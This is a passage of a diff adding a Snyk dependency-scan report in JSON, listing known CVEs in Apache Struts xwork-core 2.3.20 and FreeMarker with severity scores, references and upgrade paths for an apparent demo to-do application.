"org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.713000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.3", + "org.apache.struts.xwork:xwork-core@2.3.24.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": 
"NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.724000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Alvaro Munoz" + ], + "semver": { + "vulnerable": [ + "[2.2.1,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-036.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.264787Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:49.390018Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": 
"2024-03-11T09:46:55.264787Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n", + "epssDetails": { + "percentile": "0.94726", + "probability": "0.09408", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4461" + ], + "CWE": [ + "CWE-264" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.738000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-11-14T07:48:03.440000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-11-14T07:48:03.440000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.264787Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + 
"title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). 
The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. 
But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. 
These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.751000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + 
"id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## 
Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-07-16T11:38:49.236917Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3", + "org.apache.struts.xwork:xwork-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "title": "Insecure Defaults", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "Jasper Rosenberg" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.20.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/WW-4486", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831", + "title": "NVD" + }, + { + "url": "https://struts.apache.org/docs/s2-024.html", + "title": "Struts Security Advisory" + }, + { + "url": "http://struts.apache.org/docs/s2-024.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.093877Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n", + "epssDetails": { + "percentile": "0.85294", + "probability": "0.01190", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-1831" + ], + "CWE": [ + "CWE-453" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-10-27T13:46:24.359760Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-05-11T16:51:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-05-11T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:26.053752Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.1", + "org.apache.struts.xwork:xwork-core@2.3.20.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Huawei PSIRT" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf", + "title": "GitHub Commit" + }, + { + "url": "https://struts.apache.org/docs/s2-027.html", + "title": "Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:53.537810Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n## Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n", + "epssDetails": { + "percentile": "0.86301", + "probability": "0.01352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3090" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-ggmp-fxfg-277r" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2023-08-01T07:46:40.919855Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-14T03:15:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + 
"type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2023-08-01T09:22:02.765398Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.429176Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGFREEMARKER-1076795", + "title": "Server-side Template Injection (SSTI)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Ackcent" + ], + "semver": { + "vulnerable": [ + "[,2.3.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.freemarker:freemarker", + "references": [ + { + "url": "https://github.com/apache/freemarker/pull/62", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/FREEMARKER-124", + "title": "Jira Issue" + }, + { + "url": "https://ackcent.com/in-depth-freemarker-template-injection/", + "title": "Research Blogpost" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-06T14:04:29.670906Z" + } + ], + "description": "## Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n## Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n## References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n", + "epssDetails": null, + "identifiers": { + 